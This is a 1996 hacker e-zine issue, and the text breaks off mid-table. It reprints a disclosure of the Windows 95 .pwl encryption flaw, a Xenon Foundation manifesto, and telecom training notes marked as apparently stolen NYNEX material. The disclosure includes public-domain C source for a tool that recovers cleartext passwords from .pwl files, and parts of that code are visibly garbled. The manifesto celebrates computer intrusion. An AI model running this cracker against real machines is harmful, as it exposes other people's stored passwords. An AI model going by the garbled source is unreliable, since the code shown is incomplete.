* * * * * * * * * * * * * * * * * * * * ... -= H A C K E R S =- ... Issue #5, January, 1996 ... Edited by: Revolution .... ... ------------------- .... Hackers Forums ... ------------------- From the editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution ... ------------------- .... Technology ... ------------------- Windows.pwl cracked . . . . . . . . . . . . . . . . . . . . . .Tatu Ylonen The X Files, Issue 0 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo The X Files, Issue 1 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo The X Files, Issue 2 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo The X Files, Issue 3 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo The X Files, Issue 4 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo The X Files, Issue 5 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo The X Files, Issue 6 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo Secure Shell Faq . . . . . . . . . . . . . . . . . . . . . . Thomas Koenig ... -------------------- .... Politics ... -------------------- CuD #7.01 . . . . . . . . . . . . . . . . . . . . . . . . . CuD Moderators The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution ---------------------------------------------------------------------------- copyright 1996 by Mike Scanlon All articles remain the property of their authors, and may be reprinted with their permission. This zine may be reprinted freely as a whole electronically, for hard copy rights mail the editor. HACKERS is published by Mike Scanlon, to be added to the subscription list or to submit articles mail mrs3691@hertz.njit.edu ----------------------------------------------------------------------------- * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #1 of 12 .... From the Editor .For the first time in its short career, Hackers has already had problems going out on time. Of course, I can blame nobody but myself, seeing as I am the only one working on this zine, so, I apologize. From now on I will try to get out whatever I have, however skimpy it might be, on the first weekend of each month. .The Virus and Bug of the month author positions are still wide open, if anybody is interested, mail mrs3691@hertz.njit.edu, which is now the official email address of the zine. Anyone else working in computer security, as a hobbyist or professional, please don't be afraid to send articles in. I would like to run the letters column monthly, but of course I can't do that without reader input, so if you have any questions, flames, anything, you know where to send them. .I was promised a few articles that never ended up getting in, so this issue is mostly full of reprinted material (the X files), although it is material worth reprinting. I included CuD 7.01, because it details the recent compuserve fiasco, which I think everybody should be aware of, as it affects all of us in the long run, being the first time censorship has occured on such a large scale in the realm of cyberspace. .Anyway, enjoy! ......- Revolution * * * * * * * * * * * * * * * * * * * * As always, the standard disclaimer applies. All of these articles are provided for informational purposes only, Mike Scanlon and the respective authors cannot be held accountable for any illegal acts they are used to commit. * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #2 of 12 ....Windows.pwl cracked .... Tatu Ylonen [This post was originally discovered while reading through some bugtraq posts the credit should really be given to Frank Andrew Stevenson for the crack. ......-Revolution] Date: Mon, 4 Dec 1995 19:06:12 +0100 From: Tatu Ylonen To: ssh@clinet.fi Subject: FWD from Frank Andrew Stevenson: Cracked: WINDOWS.PWL I am sorry to send noise to the list; this deals with Windows95 but is quite relevant to many Unix administrators as well. This is not related to ssh. The ssh list is not intended for this kind of stuff, so please don't do what I am doing now. Basically, you should be aware that if you ever mount disks from Unix machines to Windows95 machines, the passwords of the unix machine (or your other file servers) will be stored on the Windows machine's disk essentially in the plain, and any 10-year computer-literate kid with a little knowledge will be able to retrieve them in seconds if he gets access to client machine. The message below explains the details. Essentially it means that the whole encryption scheme used by Microsoft in Windows95 is a Bad Joke. Not only does it use too short keys (breakable by brute force in 8 hours on a normal workstation), but additionally it screws up the implementation, meaning that your keys can be trivially decrypted in a fraction of a second without ever even brute-forcing the key. The program to do this is below. I find this kind of "security" shocking. I think this should go to the mass media. At least make people at your sites aware of this fiasco. Tatu ------- start of forwarded message (RFC 934 encapsulation) ------- From: Frank Andrew Stevenson To: cypherpunks@toad.com Subject: Cracked: WINDOWS.PWL Date: Mon, 4 Dec 1995 17:51:36 +0100 (MET) A few days ago Peter Gutmann posted a description on how Windows 95 produces RC4 keys of 32 bits size to protect the .pwl files. I verified the information and wrote a program to decrypt .pwl files with a known password, I then discovered that the .pwl files where well suited for a known plaintext attack as the 20 first bytes are completely predictable. The 20 first bytes of any .pwl files contains the username, which is the same as the filename, in capitals, padded with 0x00. From then I wrote a program to bruteforce the .pwl file and optimized it so it would run in less than 24 hours on an SGI. I run a test of the bruter software and recovered an unknown rc4 key in 8 hours, but the decrypted file was still largely uninteligeble, I then proceeded to decrypt the file at all possible starting points, and discovered valuable information (cleartext passwords) offset in the file. This has enormous implications: RC4 is a stream cipher, it generates a long pseudo random stream that it uses to XOR the data byte by byte. This isn't neccecaraly weak encryption if you don't use the same stream twice: however WIN95 does, every resource is XORed with the same pseudo random stream. What's more the 20 first bytes are easy to guess. This is easy to exploit: XOR the 20 bytes starting at position 0x208 with the user name in uppercase, and slide this string through the rest of the file (xoring it with whatever is there) this reveals the 20 first bytes of the different resources. >From there I went on to study the structure of the .pwl file it is something like this (decrypted): USERNAME.........wpwpwpwpwpwpwpwpwpwp rs??????? rs rs rs??????????? rs??????? where wp is i word pointer to the different resources (from start of pwl file) The 2 first bytes of the resource (rs) is its length in bytes (of course XOR with RC4 output) It is the fairly easy to find all the resource pointers by jumping from start of resource to next resource, had it not been for the fact that the size sometimes is incorrect (courtesy of M$) What follows is a short c program that tries to remedy this and reconstruct the pointertable thus generating at least 54 bytes of the RC4 pseudorandom stream, and then proceedes to decrypt as much as possible from the different resources. What does this show? Although RC4 is a fairly strong cipher, it has the same limitations as any XOR streamcipher, and implementing it without sufficient knowledge can have dire consequences. I strongly suggest that the programmers at Microsoft do their homework before trying anything like this again! DISCLAIMER: This is a quick hack, I don't make any claims about usefulness for any purpose, nor do I take responsibility for use nor consequences of use of the software. FUNCOM of Norway is not responsible for any of this, (I speak for myself, and let others speak for themselves) This source is hereby placed in the public domain, please improve if you can. - --- glide.c --- #include #include unsigned char Data[100001]; unsigned char keystream[1001]; int Rpoint[300]; main (int argc,char *argv[]) { FILE *fd; int i,j,k; int size; char ch; char *name; int cracked; int sizemask; int maxr; int rsz; int pos; int Rall[300]; /* resource allocation table */ if (argc<2) { . printf("usage: glide filename (username)"); . exit(1); } /* read PWL file */ fd=fopen(argv[1],"rb"); if(fd==NULL) { . printf("can't open file %s",argv[2]); . exit(1); } size=0; while(!feof(fd)) { . Data[size++]=fgetc(fd); } size--; fclose(fd); /* find username */ name=argv[1]; if(argc>2) name=argv[2]; printf("Username: %s\n",name); /* copy encrypted text into keystream */ cracked=size-0x0208; if(cracked<0) cracked=0; if(cracked>1000) cracked=1000; memcpy(keystream,Data+0x208,cracked ); /* generate 20 bytes of keystream */ for(i=0;i<20;i++) { . ch=toupper(name[i]); . if(ch==0) break; . if(ch=='.') break; . keystream[i]^=ch; }; cracked=20; /* find allocated resources */ sizemask=keystream[0]+(keystream[1]<<8); printf("Sizemask: %04X\n",sizemask); for(i=0;i<256;i++) Rall[i]=0; maxr=0; for(i=0x108;i<0x208;i++) { . if(Data[i]!=0xff) { .. Rall[Data[i]]++; .. if (Data[i]>maxr) maxr=Data[i]; . } } maxr=(((maxr/16)+1)*16); /* resource pointer table size appears to be divisible by 16 */ /* search after resources */ Rpoint[0]=0x0208+2*maxr+20+2; /* first resource */ for(i=0;i> 8) & 0x00ff; } cracked+=maxr*2+2; printf("%d bytes of keystream recovered\n",cracked); /* decrypt resources */ for(i=0;i < maxr;i++) { . rsz=Rpoint[i+1]-Rpoint[i]; . if (rsz>cracked) rsz=cracked; . printf("Resource[%d] (%d)\n",i,rsz); . for(j=0;j E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #3 of 12 .... __ ...\ / |_ .../ \ e n o n | o u n d a t i o n .... .... presents: .... .... \ / ...*------ the \ / .... / \ files ------* .... / \ .. .... Issue: 0 .... Feb/1994 ... ... Introduction By: Erik Turbo . "Yes, we are the men in black hats, taking advantage of your stupidity to gain information and knowledge about the world around us, while the man on the corner is selling drugs to your children. While rapists, child molesters, murders, and common thieves are taking advantage of the justice system, we are protecting what we believe in; the freedom to learn. You claim we invade other's privacy, while you are in the process of creating universal encryption standards that you can easily dicipher. You claim we are the villains of the information age, as you assasinate another president, cover up more information, and make shady deals with yet another foreign leader. ... Let me inform you of the ongoing state of mind, the attitude, the power, that is the Xenon Foundation. We are a handful of collective intelligence, of revolutionaries, if you will, who have combined forces to fight the horrid system of oppression we call the government. First of all, we have been, and always shall be first and foremost, computer intruders. Hackers, crackers, thieves, criminals, call us what you will, but we are not any of those. We are crusaders, on a relentless mission to gather as much information and knowledge as humanly possible, using the most powerful medium known to man - the computer - to aid us. Combine that medium with that of the telephone network and you've got an endless stream of data - of information - flowing directly through your computer, into your brain, into your soul. Feed your brain with what your consciousness craves. Liberate yourself, my friend, and take the plunge into the electronic sea of digital data. Unearth the mass of 1's and 0's that have been intentionally covered up by the vile powers that be, to protect us." ... Welcome to "the-X-files." At last, from the guild of secrets, the Ring of Five, and out of the confines of secrecy, are the Xenon Foundation's most sacred works, including some of the most extensive technical volumes that have ever been combined into any series of digital text. To recieve the-X-files via Internet mail, contact: . xfiles@bic.ponyx.com To submit an article for publication as an X file, mail: . submit@bic.ponyx.com All other mail to the Xenon Foundation should be submitted to: . xenon@bic.ponyx.com * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #4 of 12 .... __ ...\ / |_ .../ \ e n o n | o u n d a t i o n .... .... presents: .... .... \ / ...*------ the \ / .... / \ files ------* .... / \ .. ... Fall/1993 Issue: 1 .. .. INTRODUCTION TO BASIC DIGITAL TECHNOLOGY ... Written by: Erik Turbo .... .... File: 1 of 6 .. .. .. .. 1. Analog to Digital Conversion 1.1 Introduction Data communication is simply sending information from one location to another by coded signals. There are three minimum components all communincations systems have regardless of how complex or simple the system is. Those three components are: 1. a transmitter 2. a receiver 3. a transmission path between the transmitter and receiver Information is sent over communication systems from one location to another via data signals. There are two basic types of signals: > Analog > Digital On the next few pages you will read about analog and digital technology. Analog technology is used by customers that do not require sending infor- mation at high speed. Currently Analog services are cheaper than digital services but this will not always be the case. Analog technology does not offer the reproduction quality nor the vast services which are offered with digital technology instead of analog. Digital technology has only become available in the 80's. 1.2 Overall Configuration And Digital Concepts Central Office 1 Central Office 2 _______________ ________________ | D4 | | D4 | | _____ | | _____ | __________ | | |=====|=====================| | | | | | | | FXO | | | | FXS | |====== | TELPHONE | | | | | | | | | |__________| | |_____|=====|=====================| |_____| | | | | | |_______________| |________________| ........ The FX Circuit configuration above contains groups of components that comprise most Special Service Circuits. These components include the following: > Switching Equipment > Facilities: - Exchange - Interoffice > Facility Terminal Equipment > All three component groups exist in either an Analog or Digital environment 1.3 Analog Signal Characteristics An Analog signal is a continously varying voltage and current quantity representing the human voice. The amplitude represents the loudness and the number of cycles per second represents the voice frequency: Characteristics of the Analog signal are: 1. The signal is continuous in time. 2. All values are permitted in the positive maximum limits defined. 3. In Analog transmission systems, the sound being transmitted is represented by the shape of the Analog signal. 1.4 Analog Signal Generation .. __________________ .. | | \ | | / . \ | | / . | | VARIABLE | | SOUND --> |======| RESISTOR |=====| ----> REPRODUCED WAVE | | | | SOUND . / | | \ WAVE 1 / 2 | 3 | 4 \ .. ------------------ Analog Signal Generation The generation of an Analog signal takes the following steps: 1. When a person speaks into the transmitter of a telephone set, changes in the air pressure, sound waves, and sensed by the diaphragm (2) 2. The diaphragm repsonds to changing air pressure and changes circuit resit- ance by compressing carbon in the transmitter. 3. The change in resistance causes current flow to fluctuate, creating an electrical wave analogous to the sound wave. 4. Fluctuating current flows through the coil and vibrates the receiver diaphragm, which reproduces the sound wave. AN ANALOG SIGNAL IS A CONTINOUSLY VARYING REPRESENTATION OF A SOUND WAVE. 1.5 Analog Waves - Components An Analog signal is composed of amplitude and frequency. These components define the sound wave an Analog signal represents. The amplitude and frequency are two characterisitcs of the analog signal that can be varied to convey information. Amplitude is the measure of the volume or loudness of the Analog signal. Amplitude is the relative strength of the signal. Frequency is the number of cycles in a unit of time. 1.6 Frequency Frequency is related to the pitch of a sound. Frequency is measured in Hertz (Hz) - The number of cycles or oscillations per second. Frequency and amplitude relationships: 1. Low frequency, low amplitude - whispering at a low pitch. 2. Low frequency, high amplitude - yelling at a low pitch. 3. High frequency, low amplitude - whispering in a high pitch. 4. High frequency, high amplitude - yelling at a high pitch. 1.7 Analog Signal Impairments > Loss - Attenuation > Noise - Unwanted Electrical Signals > Distortion - Frequency Characteristic Changes Attenuation (Loss) and Amplification. The ideal transmission channel will deliver an accurate replica of the original signal to the receiving terminal. Three major problems affect the transmission of Analog signals: 1. LOSS - Weakening of the signal 2. NOISE - Unwanted electrical signals that interfere with the information . signal. 3. DISTORTION - Changing of the frequency characteristics of the signal. 1.8 Analog Signal Attenuation and Amplificiation > The signal is continuously attenuated, or weakened, as it progresses along the transmission medium. > The signal is then amplified at intervals to compensate for the attenuation. > Line loss can be overcome by properly spacing amplifiers in the circuit. 1.9 Amplifying Distorted Signals > The Analog signal is also affected by noise and distortion. > Analog signals pick up noise as they travel through the network. > Noise and distortion change the shape of the Analog signal. > Amplifiers are designed to reproduce all of the variation of the Analog signal, the amplifier cannot distinguish between the voice, noise, and distortion components of the Analog signal. > The amplifier amplifies the entire input signal, thus the noise is amplified along with the original signal. > As the signal path increases in length and more amplification is needed, more noise is introduced. > The effects of noise and distortion is cumulative along the Analog trans- mission system. 1.10 Analog Signal Disadvantage > The major disadvantage of Analog transmission systems is the cumulative nature of transmission impairments. > Loss can be overcome by amplification to increase the sigmnal to its original value. Noise is also amplified. > Once introduced, the effects of noise and distortion cannot be eliminated. > Digital transmission systems solve the "Analog Problem." 1.11 Digital Transmission Concepts Digital Signal Definition A Digital signal is a discontinuous signal in the form of pulses. Good examples would be flashes of light, telegraph clicks, and dialing pulses. A transmitted Digital signal generally represents a series of on/off pulses, transmitted at a steady rate and amplitude. 1.12 Digital Signal Regeneration Digital transmission systems solve the basic "Analog Problem" of cumulative effects of noise and distoriton by regenerating rather than amplifying the transmitted signal. The regenerative repeater detects the presence of a pulse, (signal), and creates a new pulse, (signal), based on a sample of the existing signal. The regenerated signal duplicates exactly the signal originally transmitted. This eliminates the cumulative effects of noise and distortion inherent in Analog facilities. Distortion is not amplified as it is an Analog signal, it is omitted when the signal is regerated. 1.13 Comparison of Analog and Digital Signals The Analog signal is a signal that varies in a continuous manner over a wide range of amplitude and time. As you know, in Analog transmission, amplifiers were used to boost the strenght of the signal. With Analog signal transmission, the line noise is amplified along with the signal at each repeater point. Thus, as the distance increases, so does the distortion. The Digital signal is a series of pulses, all having a specified amplitude and duration in time. A Digital signal has only a discrete number of states, 0 or 1. This on/off state simplifies the process of detecing and regerating the digital bit stream. Instead of amplifying the signal, a rengenerator produces a fresh signal based on a sample of the existing signal. By using this method, noise does not accumulate. At each repeater location, the incoming Ditital signal is regenerated into the correct 0 or 1 signal. While the associated line noise is ignored. 1.14 Analog to Digital Conversion - Overview ...... 1 1 0 1 0 1 1 /\ ______ __________ ________ _ _ _ _ _ / \ /==| | | | | | | | | | | | | | | | \/ |SAMPLE|==| QUANTIZE |===| ENCODE |_| |_| |___| |___| |_| |__ ANALOG |______| |__________| |________| SIGNAL Analog to Digital Conversion Converting an Analog signal to a Digital signal requires the steps of sampling, quanitizing, and encoding. > Sampling In the sampling process, portions of a signal are used to represent the whole signal. Each time the signal is sampled, a Pulse Amplitude Modulation (PAM) signal is generated. In order to accurately reproduce the Analog signal (speech), a sampling rate of at least twice the highest frequency to be reproduced is required. Because a majority of voice frequencies are less than 4 KHz, and 8 KHz sampling rate has been established as the standard. > Quantizing In order to obtain the Digital signal, the Pulse Amplitude Modulation (PAM) signal is measured and coded. The amplitude or height of the PAM is measured to derive a number that represents its amplitude level. > Encoding The decimal (Base 10) number derived in the quanitizing step is then converted to its equivalent 8 bit binary number. The output is an 8 bit "word" in which each bit may be either a "1" (pulse) or a "0" (no pulse) This process is repeated 8,000 times a second for a telephone voice channel service. 1.15 Filtering The range of frequencies in the human voice approximates 50 Hz to 20,000 Hz. Telephone transmission systems are arranged to transmit Analog signals between 200 Hz and 4,000 Hz. Extreme frequencies below 200 Hz and above 4,000 Hz are removed by a process called Filtering. 1.16 Sampling The sampler measures the filtered Analog signal 8,000 times a second, or once ever 125 microsecons (u sec.) The value of each of these samples is directly proportional to the amplititude of the Analog signal at the time of the sample. The sampling process is called Pulse Amplitude Modulation (PAM) 1.17 Quantizing Quantizing is essentially matching the PAM signals to one of the 255 numbers on a segmented scale. The quantizer measures the amplitude or height of each PAM signal coming from the sampler and assigns it a value from -127 to plus 127. 1.18 Pulse Code Modulation (PCM) Encoding Encoding involves the conversion of the number that was determined in the quantizing step, to a binary number. each quantized PAM signal is conerted ito an 8-bit binary "word" in which each bit may be either a "1" (pulse) or a "0" (no pulse). The 8-bit "word" represents the binary equivalent of the number from the quantizing step. 1.19 PCM Encoding Example If the Pulse Amplitude Modualation (PAM) signal measures +45 on the quantizing scale, the output of the encoding step is the 8-bit word "10101101" (ie: the binary equivalent of +45.) 1.20 Digital to Analog Conversion At the receiving terminal the following occurs: > The Digital pulses are converted back to the original Analog signal. > The Pulse Code Modulation (PCM) signals are decoded to the Pulse Amplitude Modulation (PAM) signals they represent. > The succession of PAM signals are passed through a filter, thereby reconstructing the orignal analog wave form. 1.21 Conclusion Some customers are still using analog technology for services like FX lines, POT lines, WATTS lines and voice services. These customers feel they don't need the high speed of the quality of digital services. Currently the Analog services are cheaper than the Digital services, although this could change. In our fast paced environment many customners want higher speed communications with top quality. Digital technology provides this and allows our customers to send data and voice communications simulataneously. Our jobs will be influenced greatly by the new services our customers want, which only digital technology can provide. You will learn about the services which only digital technology can offer later on in this manual. ....NOTICE Not for use or disclosure outside the NYNEX Corporation or any of its subsidiaries except when rightfully stolen. ------------------------------------------------------------------------------ EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF ------------------------------------------------------------------------------ * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #5 of 12 .... __ ...\ / |_ .../ \ e n o n | o u n d a t i o n .... .... presents: .... .... \ / ...*------ the \ / .... / \ files -----* .... / \ .. ... Fall/1993 Issue: 2 .. .. INTRODUCTION TO BASIC DIGITAL TECHNOLOGY ... Written by: Erik Turbo .... .... File: 2 of 6 2. Time Division Multiplexing (TDM) 2.1 Defining Multiplexing Multiplexing basically combines or merges a number of signals into one composite signal. The most common type of multiplexer at NET is called a TIME DIVISION MULTIPLEXER. Time Division Multiplexing In the telephone industry, the D Channel Bank Time Division Multiplexer is the type most commonly used and the one you will probably use. The D Channel Bank Time Division Mutliplexer works by taking twenty four (24) voice channels and time division multiplexing them at the near end terminal. Then the signals are sent over a pair of wires to the far end terminal. This smae process is occuring at the far end terminal. The signal from the far end terminal is sent over another pair of wires to the near end terminal. Each terminal is equipped to restore the signal recieved to its orignal form. Time Division Multiplexing is used to take low speed information, sample it, and then send this information over a high speed data line. Each time all twenty four (24) channels have been sampled and sent, a framing signal is sent. This framing signal aids the far end terminal in identying and reassembling all of the information for each channel. This process is known as synchronizing data. On the next page you will learn how the sampled signals are quantized and encoded by a process called Pulse Code Modulation (PCM) before they are transmitted via Time Division Multiplexing to a distant terminal. 2.2 Multiplexing--Pulse Code Modulation (PCM) > At 8,000 samples per second, a single channel is sampled once per 125 micro-seconds. Each sample uses 5.2 microseconds of time. > There are approximately 120 microseconds of idle time between each sample on a single channel Pulse Code Modulation (PCM) facility. > To make efficient use of the facility, many samples are sent on the same path, which is called multiplexing. 2.3 Pulse Code Modulation (PCM) Frame A Frame requires 125 microseconds to transmit and contains once encoded sample (8-bit word) for each channel that is multiplexed, plus the framing bit. The Frame is sub-divided into Time Slots. A Time Slot represents the time required the send one 8-bit word. The basic Pulse Code Modulation (PCM) bit stream contains 1,544,000 bits/sec. 2.4 DS1 Bit Rate Computation 24 CHANNELS x 8 BITS/WORD 192 BIT + 1 FRAMING BIT 193 BITS/FRAME X 8000 TIMES/SEC 1544000 BITS/SEC OR 1.544 M BITS/SEC 2.5 Time Division Multiplex (TDM) > This diagram shows the overall digital transmission system. > The Analog signal is sampled 8000 times a second via a process called Pulse Amplitude Modulation (PAM). The Pulse Amplitude Modulation (PAM) sample represents the amplitude of the signal at the time of sampling. > Each Pulse Amplitude Modulation (PAM) sample is quanitzed and encoded to an 8-bit Digital signal via a process called Pulse Code Modulation (PCM). > The Pulse Code Modulation (PCM) samples from all 24 channels are combined via a process called Time Division Multiplexing and transmitted to a distant terminal over a common path. > At the distant terminal, the Pulse Code Modulation (PCM) samples are decoded, demultiplexed and filtered to reconstruct the orignal Analog waveform. 2.6 Conclusion Multiplexing is vital to our business because it allows us to take advanage of the idle time between each signle channel Pulse Code Modulation (PCM) facility. The idle time is used efficiently via multiplexing which allows us to send many samples on the same path. So multiplexing maximizes efficient use of the facility and reduces idle time by sending numerous samples over the same path. ....NOTICE Not for use or disclosure outside the NYNEX Corporation or any of its subsidiaries except when rightfully stolen. ------------------------------------------------------------------------------ EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF ------------------------------------------------------------------------------ * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #6 of 12 ... .... __ ...\ / |_ .../ \ e n o n | o u n d a t i o n .... .... presents: .... .... \ / ...*------ the \ / .... / \ files ------* .... / \ .. ... Fall/1993 Issue: 3 .. .. INTRODUCTION TO BASIC DIGITAL TECHNOLOGY ... Written by: Erik Turbo .... .... File: 3 of 6 .. .. .. 3. Channel Banks 3.1 Introduction In this next section you will learn about a typical digital facility. Most digital facilities contain: > Channel Banks > A Transmission System You will learn about the channel banks and a typical transmission system which includes: > Loop Plant - Loop Cables - Impairments - Digital Loop Carrier (DLC) - SCL 96--Modem 3 3.2 Digital Channel Banks > The function of the digital facility is to provide 24 Voice Frequency (VF) channels from one point to another over a PCM transmission system. The most basic type of digital facility consists of two elements: 1. Channel Banks (or terminals) 2. A Transmission System > The channel banks provide the A/D interface between 24 VF circuits and a digital Pulse Code Modulation (PCM) transmission system. The digital transmission signal between two channel banks. 3.3 Loop Plant The loop plant is the connect between the telephone customer and the serving Central Office. Most loops are quite short, the median length is about 1.7 miles. 1. Loop Cables The loop plant gernerally consists of metallic cable pairs. Typical cable gauges are the 19, 22, 24, or 26 gauge. The higher the gauge number, the smaller the wire diameter and the more resistance per foot. CABLE GAUGE OHMS/KFT ------------------------------------------------------- . 26 83.2 . 24 51.9 . 22 32.8 . 19 16.3 2. Impairments As the distance from the Central Office increases, so does transmission loss. Switching systems and telephone equipment are designed to oper- ate at specified limits, therefore, the loop plant is generally limited without treatment from 1,300 to 1,500 ohms. In addition the resistance, another factor that impacts transmission is loop capacitance. 3. Digital Loop Carrier (DLC) The loop capacitance results in greater loss at the higher frequencies. To care for this, loop cable over 18 Kft are equipped with load coils. New loop cable configurations, longer than 24 Kft, generally used Digital Loop Carrer (DLC) such as SLC 96. 3.4 Digital Loop Carrier (DLC) Digital Loop Carrier (DLC) systems are being installed in significant numbers, about 50,000 DS1 lines per year, to provide new services and reduce cost. The systems in use include AT&T SLC 96 system, Norther TELECOM's DMS-1 Urban, and systems from other vendors. The SLC 96 system is a digital subscriber carrier system which provides up to 96 subscriber lines. It provides residential, coin, and special services. SLC 96 operates in three modes with Mode 3 used for special service including Digital Data Services (DDS) dataport. This SLC 96 layout is similar to Mode 1 and Mode 2 having a Central Office (CO) and Remote Terminal (RT). The major difference is that the channels are reduced from 24 to 12 for each bank. D4 Channel units can be used in the SLC 96 Mode 3 arrangement The Mode 3 arrangement has two T1 (DS1) lines plus one T1 for protection in case of a line problem on either of the service lines. ------------------------------------------------------------------------------ EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF ------------------------------------------------------------------------------ * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #7 of 12 .... __ ...\ / |_ .../ \ e n o n | o u n d a t i o n .... .... presents: .... .... \ / ...*------ the \ / .... / \ files ------* .... / \ .. ... Fall/1993 Issue: 4 .. .. INTRODUCTION TO BASIC DIGITAL TECHNOLOGY ... Written by: Erik Turbo .... .... File: 4 of 6 .. . 4. Digital Transmission 4.1 Interoffice Facilities Below is a list of interoffice facilities required for digital transmission of data. 1. VF Facilities A small number of Special Services circuits use VF, Voice Frequency, pairs for the facility between Central Offices. a. MFT Equipment The Metallic Facility Terminal (MFT) is the AT&T family of plug-in equipment developed to provide transmission and/or signaling fuctions required for metallic facilities. MFT provides the interfect between VF metallic circuits and switching systmes, station equipment, or another metallic cable. In addition to metallic facilities, micro-wave radio is utilized for both digital and analog transmission. Fiber-optic facilites are also utilized for digital transmission. 2. Carrier Facilities Carrier facilities, both analog and digital, are pair gain devices. They are more economic than using Voice Frequency (VF) metallic cable pairs. 3. Digital Transmission Systems a. Digital Hierarchy Digital terminals are connected together by an almost countless number of facility and equipment configurations. b. Digital Channel Banks The most common channel banks used by the BOCs are the AT&T D4 and D5 terminals. The channel units provide transmission and signalling features required to interface with 2 or 4 wire circuits. 4.2 T1 Carrier Line The T1 line carries DS1 signals (1.544 Mb/s) between signal digroup channel banks using four-wire bidirectional transmission over standard cable pairs. 4.3 Digital Line Coding > Bipolar Coding Bipolar coding is the basic line coding procedure used by T-carrier lines. A Bipolar code uses alternating polarties for encoding "1"'s. > Clear Channel Capability Clear Channel Capability is used to describe the capability to transmit a DSO or DS1 level signal which contains any mix of ones and zeros, including all zeros. The density requirement is no more than 15 zeros. If more than 15 zeros are used then ones must be put in or an error will result. Due to current signaling and maintenance requirements, only 56 kbps of the DSO signal is available for use by the customer. In order to provide 64 kbps Clear Channel Capability (64 CCC), the Bipolar with Eight Zero Substitution (B8ZS), is the method recommended as the North American Standard. However, interim methods such as Fractionally Controlled Mutliplexing (FCM), or Zero Byte Time Slot Interchange (ZBTSI), can be utilized as an expedient. > Bipolar Advantages - Simplifies error detection - Elimates DC components - Reduces bandwith requirements 4.4 Digital Wave Forms 0 1 1 0 0 1 0 1 +V ----------- ----- ----- .| | | | | | 0V _____|___________|__________|_____|______|_____|_ -V Unipolar Non-return to zero 0 1 1 0 0 1 0 1 +V ---- ---- ----- ----- .| | | | | | | | 0V _____|____|_|____|__________|_____|______|_____|_ -V Unipolar Return to Zero 0 1 1 0 0 1 0 1 +V ---- ----- .| | | | 0V _____|____|_________________|_____|______________ . | | | | -V |_____| |_____| Bipolar non Return to Zero 0 1 1 0 0 1 0 1 +V ____ ____ .| | | | 0V _____|____|_________________|____|______________ . | | | | -V |____| |____| Bipolar Return to Zero Comparison of Digital Waveforms 4.5 Error Detection + ____ ____ ____ | | | | | | 0 ____| |________ ____| |__________ ___| |________ .. | | | | - |____| |____| ...... /\ < -- Noise Burst + _____/\_______________________________________/____\___________________ / \ / \ /\ /\ / \ __ / \ 0 _/________\____/____ \____/____\/____\____/____________\/__\____/_____\ . \/ \/ \/ \/ \ - _______________________________________________________________________ .... .... Bi-Polar Violation ..... | ..... | + ____ ____ ____ ____ | | | | | | | | 0 ____| |________ ____| |___| |_ ___| |________ .. | | | | - |____| |____| Error Detection The error detection technique is very simple. Since each successive "1" bit is of opposite polarity, and extra pulse will show up as an error. This error detection technique is called Bipolar Violation Detection. 4.6 Analog Switching with Digital Transmission .. .. .. .. __________ 1 001010 2 _______ 3 _________ | Local | __ __ |Toll | __ |Telephone|----|-x--x--x--|------|__|----------|__|------|-x-x-x-|---|__|-. --------- | Office | |Office | |0 .. |__________| |_______| |0 .... Analog - Digital |1 .... Conversion |0 ......... |1 ......... |0 .. __________ 6 5 _______ 4 | _________ | Local | __ 001010 __ |Toll | __ | |Telephone|----|-x--x--x--|------|__|----------|__|------|-x-x-x-|---|__|-. --------- | Office | |Office | .. |__________| |_______| ......... Key: 1,2,3,4,5 and 6 are Analog/Digital Conversion switching systems 001010 is the digital bit-stream representation of the analog signal Analog Switching with Digital Transmission diagram The diagram shows an Analog signal being converted to Digital for transmission and back to Analog for switching. This configuration causes additional noise and distortion to be added to the Analog signal. ...... Toll Office .. __________ 1 ________ _________ | Local | __ 01101110 | | |Telephone|----|-x--x--x--|------|__|---------------|01101110|-------. --------- | Office | | | | .. |__________| |________| | ........ | ...... Toll Office | .. __________ 2 ________ | _________ | Local | __ 01101110 | | | |Telephone|----|-x--x--x--|------|__|---------------|01101110|-------. --------- | Office | | | .. |__________| |________| ........ ........ Digital Switching with Digital Transmission > Four points of analog/digital conversion have been elimated from the previous example. > The digital switch will switch the digital stream directly. Therefor, digital to analog conversion is not needed. > The introduction of a digital toll office reduces the need for some analog/digital conversion. > This reduces the cost of providing additional digital transmission facilities since no analog/digital conversion will be required at the toll office location and this will improve the overall transmission. ------------------------------------------------------------------------------ EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF ------------------------------------------------------------------------------ * * * * * * * * * * * * * * * * * * * * ....-= H A C K E R S =- ... Issue #5, File #8 of 12 .... __ ...\ / |_ .../ \ e n o n | o u n d a t i o n .... .... presents: .... .... \ / ...*------ the \ / .... / \ files ------* .... / \ .. ... Fall/1993 Issue: 5 .. .. INTRODUCTION TO BASIC DIGITAL TECHNOLOGY ... Written by: Erik Turbo .... .... File: 5 of 6 5. Digital Hierarchy 5.1 Digital Hierarchy Chart ____________________________________________________________________________ | LEVEL | BIT RATE | NO. OF VOICE | FACILITY | NUMBER OF | TYPE DSX | | | | CIRCS. EQUIV. | | DIGROUPS | | |----------------------------------------------------------------------------| | | 1667 Mb/sec | 24192 | FT "G" | 1008 | LCIE | | DS5 | 564.922Mb/s | 8064 | LTS 1565 | 336 | LCIE | | | 417 Mb/s | 6048 | FT "G" | 252 | LCIE | | DS4 | 274.176Mb/s | 4032 | LIGHTWAVE | 168 | LCIE | | DS3C | 89.472 